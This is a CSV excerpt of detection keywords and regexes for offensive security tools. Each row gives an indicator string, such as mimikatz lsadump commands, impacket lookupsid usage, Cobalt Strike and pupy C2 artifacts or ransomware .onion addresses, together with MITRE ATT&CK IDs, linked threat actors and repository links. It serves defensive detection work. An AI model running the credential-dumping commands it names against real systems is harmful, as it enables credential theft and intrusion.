"*logs/theHarvester.py.log*",".{0,1000}logs\/theHarvester\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51346"
"*logToBeaconLog*",".{0,1000}logToBeaconLog.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","51348"
"*lolbin.exe *",".{0,1000}lolbin\.exe\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","51349"
"*LOLBins/NetLoader.xml*",".{0,1000}LOLBins\/NetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","51350"
"*Lolipop.php - Edited By KingDefacer*",".{0,1000}Lolipop\.php\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","51351"
"*LOLSpoof.exe*",".{0,1000}LOLSpoof\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","51352"
"*Londor.exe -t Coverage*",".{0,1000}Londor\.exe\s\-t\sCoverage.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51353"
"*Londor.exe -t Script*",".{0,1000}Londor\.exe\s\-t\sScript.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51354"
"*looCiprian/GC2-sheet*",".{0,1000}looCiprian\/GC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","51355"
"*lookupsid.py -hashes :* *@* 0*",".{0,1000}lookupsid\.py\s\-hashes\s\:.{0,1000}\s.{0,1000}\@.{0,1000}\s0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51356"
"*lookupsid.py*",".{0,1000}lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","51357"
"*looneypwner.sh *",".{0,1000}looneypwner\.sh\s.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","51358"
"*LooneyPwner-main*",".{0,1000}LooneyPwner\-main.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","51359"
"*loot_memory.py*",".{0,1000}loot_memory\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","51360"
"*loot_mysql_passwords(*",".{0,1000}loot_mysql_passwords\(.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","51361"
"*lorenzedzyzyjhzxvlcv347n5piltxamo755pzqpozh5l47kj7mxueid.onion*",".{0,1000}lorenzedzyzyjhzxvlcv347n5piltxamo755pzqpozh5l47kj7mxueid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51362"
"*lorenzezzwvtk3y24wfph4jpho27grrctqvf6yvld7256rnoz7yg2eid.onion*",".{0,1000}lorenzezzwvtk3y24wfph4jpho27grrctqvf6yvld7256rnoz7yg2eid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51363"
"*lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion*",".{0,1000}lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51364"
"*Lost connection to team server! Sleeping 60 second and retrying?*",".{0,1000}Lost\sconnection\sto\steam\sserver!\sSleeping\s60\ssecond\sand\sretrying\?.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","51365"
"*LostMyPassword.exe*",".{0,1000}LostMyPassword\.exe.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51366"
"*LostMyPassword.zip*",".{0,1000}LostMyPassword\.zip.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51367"
"*LostMyPasswordx64.zip*",".{0,1000}LostMyPasswordx64\.zip.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51368"
"*lotus2john.py*",".{0,1000}lotus2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51369"
"*Lovely-Potato*",".{0,1000}Lovely\-Potato.{0,1000}","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","N/A","10","2","142","30","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z","51370"
"*lpfcbjknijpeeillifnkikgncikgfhdo*",".{0,1000}lpfcbjknijpeeillifnkikgncikgfhdo.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","51371"
"*ls -la netkit.ko*",".{0,1000}ls\s\-la\snetkit\.ko.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","51374"
"*ls -r $ExfilDocname*",".{0,1000}ls\s\-r\s\$ExfilDocname.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","51375"
"*L'S', L'e', L'D', L'e', L'b', L'u', L'g', L'P', L'r', L'i', L'v', L'i', L'l', L'e', L'g', L'e'*",".{0,1000}L\'S\',\sL\'e\',\sL\'D\',\sL\'e\',\sL\'b\',\sL\'u\',\sL\'g\',\sL\'P\',\sL\'r\',\sL\'i\',\sL\'v\',\sL\'i\',\sL\'l\',\sL\'e\',\sL\'g\',\sL\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51376"
"*LSA dump programe (bootkey/syskey) - pwdump and others*",".{0,1000}LSA\sdump\sprograme\s\(bootkey\/syskey\)\s\-\spwdump\sand\sothers.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51378"
"*lsa_decryptor.py*",".{0,1000}lsa_decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","51379"
"*lsa_decryptor_nt*.py*",".{0,1000}lsa_decryptor_nt.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","51380"
"*lsa_secrets.md*",".{0,1000}lsa_secrets\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51381"
"*lsadecryptor_lsa_decryptor*",".{0,1000}lsadecryptor_lsa_decryptor.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","51382"
"*lsadump.exe*",".{0,1000}lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","51383"
"*lsadump::*",".{0,1000}lsadump\:\:.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51384"
"*lsadump::backupkeys*",".{0,1000}lsadump\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51385"
"*lsadump::cache*",".{0,1000}lsadump\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51386"
"*lsadump::changentlm*",".{0,1000}lsadump\:\:changentlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51387"
"*lsadump::dcshadow*",".{0,1000}lsadump\:\:dcshadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51388"
"*lsadump::dcsyn*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51389"
